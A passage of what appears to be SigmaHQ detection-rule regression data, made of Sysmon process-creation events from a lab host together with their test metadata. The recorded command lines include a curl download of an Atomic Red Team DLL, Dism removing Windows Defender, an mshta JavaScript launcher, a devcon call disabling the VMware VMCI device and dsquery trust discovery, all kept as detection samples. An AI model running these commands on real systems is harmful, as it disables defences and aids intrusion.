"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
"ParentProcessId": 14736,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml
================================================
id: ef93f624-2b41-41ee-9596-298d3158acfb
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec
title: Insecure Transfer Via Curl.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T06:45:56.284330Z"
}
},
"EventRecordID": 21680,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 06:45:56.239",
"ProcessGuid": "0197231E-68A4-693A-0713-000000000800",
"ProcessId": 13700,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
"ParentProcessId": 14736,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml
================================================
id: 11dd9a12-467e-4c13-b928-7c3aea60f59f
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77
title: Insecure Proxy/DOH Transfer Via Curl.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-11T06:51:23.281436Z"
}
},
"EventRecordID": 21706,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-11 06:51:23.255",
"ProcessGuid": "0197231E-69EB-693A-1313-000000000800",
"ProcessId": 13896,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.10.1",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
"ParentProcessId": 14736,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml
================================================
id: 4dfcc9a3-f555-4692-aa17-bca049de2f61
description: N/A
date: 2025-12-11
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: aa6f6ea6-0676-40dd-b510-6e46f02d8867
title: Local File Read Using Curl.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:23:21.381915Z"
}
},
"EventRecordID": 8613670,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:23:21.362",
"ProcessGuid": "5AA13A44-CF49-68FC-2630-000000004002",
"ProcessId": 9032,
"Image": "C:\\Windows\\System32\\curl.exe",
"FileVersion": "8.13.0",
"Description": "The curl executable",
"Product": "The curl executable",
"Company": "curl, https://curl.se/",
"OriginalFileName": "curl.exe",
"CommandLine": "curl -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/info.yml
================================================
id: e2254736-78df-48bf-acd9-e36f914e21bc
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: e218595b-bbe7-4ee5-8a96-f32a24ad3468
title: Suspicious Curl.EXE Download
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-01-23T03:54:56.824925Z"
}
},
"EventRecordID": 23370,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2026-01-23 03:54:56.816",
"ProcessGuid": "0197231E-F110-6972-3D16-000000000800",
"ProcessId": 12132,
"Image": "C:\\Program Files (x86)\\Windows Kits\\10\\Tools\\10.0.26100.0\\x64\\devcon.exe",
"FileVersion": "10.0.26100.6584 (WinBuild.160101.0800)",
"Description": "Device Console",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "DevCon.exe",
"CommandLine": "devcon.exe disable \"ROOT\\VMWVMCIHOSTDEV\"",
"CurrentDirectory": "C:\\Program Files (x86)\\Windows Kits\\10\\Tools\\10.0.26100.0\\x64\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=36A56121DBE964347C859F95E996B26F,SHA256=282FF232C35FCB82DAD2FDAE56C775523409494B175A5A83D7441B5FA65CB3F9,IMPHASH=A0225EB3236EA941773B705076ADA2AF",
"ParentProcessGuid": "0197231E-F0B6-6972-3816-000000000800",
"ParentProcessId": 4244,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/info.yml
================================================
id: 00d836cd-522f-41c8-b6a5-e1bf5d1d388d
description: N/A
date: 2026-01-23
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 85f520e7-6f5e-43ca-874c-222e5bf9c0de
title: Devcon Execution Disabling VMware VMCI Device
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:41:03.540138Z"
}
},
"EventRecordID": 8933629,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:41:03.533",
"ProcessGuid": "5AA13A44-D36F-68FC-CE30-000000004002",
"ProcessId": 5956,
"Image": "C:\\Users\\Administrator\\Downloads\\DirLister.exe",
"FileVersion": "2.0.0.0",
"Description": "DirLister.UI",
"Product": "DirLister.UI",
"Company": "DirLister",
"OriginalFileName": "DirLister.exe",
"CommandLine": "\"C:\\Users\\Administrator\\Downloads\\DirLister.exe\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=561771830EDE663651F3E6D731656D5D9E2BB19A,MD5=909E97D239C54B4563B61573FAE63C22,SHA256=C939927D7AB06E05B1B6E4951E8F7C45E54BA4EC3CA9399D7E1D9F5CA67C849C,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",
"ParentProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ParentProcessId": 7680,
"ParentImage": "C:\\Windows\\explorer.exe",
"ParentCommandLine": "\"C:\\Windows\\explorer.exe\" /NoUACCheck",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/info.yml
================================================
id: 3e64088e-d05c-4e03-ac62-d5961672d33e
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: b4dc61f5-6cce-468e-a608-b48b469feaa2
title: DirLister Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:44:33.440907Z"
}
},
"EventRecordID": 8999629,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:44:33.433",
"ProcessGuid": "5AA13A44-D441-68FC-E330-000000004002",
"ProcessId": 7112,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v CurrentBuildNumber",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=E65FAA187D27D84106B78B909C06D405837EC64E,MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml
================================================
id: 23b1ddfe-cb7d-4e2f-9ae3-d96eabe0f6e1
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 0022869c-49f7-4ff2-ba03-85ac42ddac58
title: System Information Discovery via Registry Queries
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:47:34.903176Z"
}
},
"EventRecordID": 9055342,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:47:34.894",
"ProcessGuid": "5AA13A44-D4F6-68FC-F430-000000004002",
"ProcessId": 7808,
"Image": "C:\\Windows\\System32\\Dism.exe",
"FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)",
"Description": "Dism Image Servicing Utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "DISM.EXE",
"CommandLine": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=0AABFEC24BA5FC8806492DCCE89094743219EDE4,MD5=0B1CB657FF6BF807D830A5B970ECC041,SHA256=1B1EC450CE9B4559C6A2AE8ED5D8715F5135BE20257DC84ED11EBB814F29A1F2,IMPHASH=7B40129B2F7F51468E0954D5A44D9CDD",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/info.yml
================================================
id: b4459771-0fe5-4777-be95-ea6fce92d1fc
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 43e32da2-fdd0-4156-90de-50dfd62636f9
title: Dism Remove Online Package
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T23:53:43.425641Z"
}
},
"EventRecordID": 33534161,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:53:43.425",
"ProcessGuid": "5AA13A44-B487-68FE-7F5F-000000004002",
"ProcessId": 2052,
"Image": "C:\\Windows\\System32\\driverquery.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Queries the drivers on a system",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "drvqry.exe",
"CommandLine": "\"C:\\Windows\\System32\\driverquery.exe\"",
"CurrentDirectory": "C:\\Windows\\Temp\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461",
"ParentProcessGuid": "5AA13A44-B487-68FE-7E5F-000000004002",
"ParentProcessId": 11360,
"ParentImage": "C:\\Windows\\System32\\mshta.exe",
"ParentCommandLine": "mshta \"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/info.yml
================================================
id: 585f7fa9-392b-4609-b324-4701482de7ec
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 9fc3072c-dc8f-4bf7-b231-18950000fadd
title: Potential Recon Activity Using DriverQuery.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T23:47:36.476583Z"
}
},
"EventRecordID": 33403755,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:47:36.462",
"ProcessGuid": "5AA13A44-B318-68FE-4B5F-000000004002",
"ProcessId": 8840,
"Image": "C:\\Windows\\System32\\driverquery.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Queries the drivers on a system",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "drvqry.exe",
"CommandLine": "driverquery",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/info.yml
================================================
id: 13b0c2d7-2056-4ce4-85df-79f7e499dd49
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: a20def93-0709-4eae-9bd2-31206e21e6b2
title: DriverQuery.EXE Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T13:48:36.392892Z"
}
},
"EventRecordID": 9075053,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 13:48:36.383",
"ProcessGuid": "5AA13A44-D534-68FC-FF30-000000004002",
"ProcessId": 168,
"Image": "C:\\Windows\\System32\\dsquery.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Microsoft AD DS/LDS query command line utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "dsquery.exe",
"CommandLine": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC",
"ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
"ParentProcessId": 6304,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml
================================================
id: 91c77c64-7f4f-4bba-be6a-42377c97b48a
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 3bad990e-4848-4a78-9530-b427d854aac0
title: Domain Trust Discovery Via Dsquery
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json
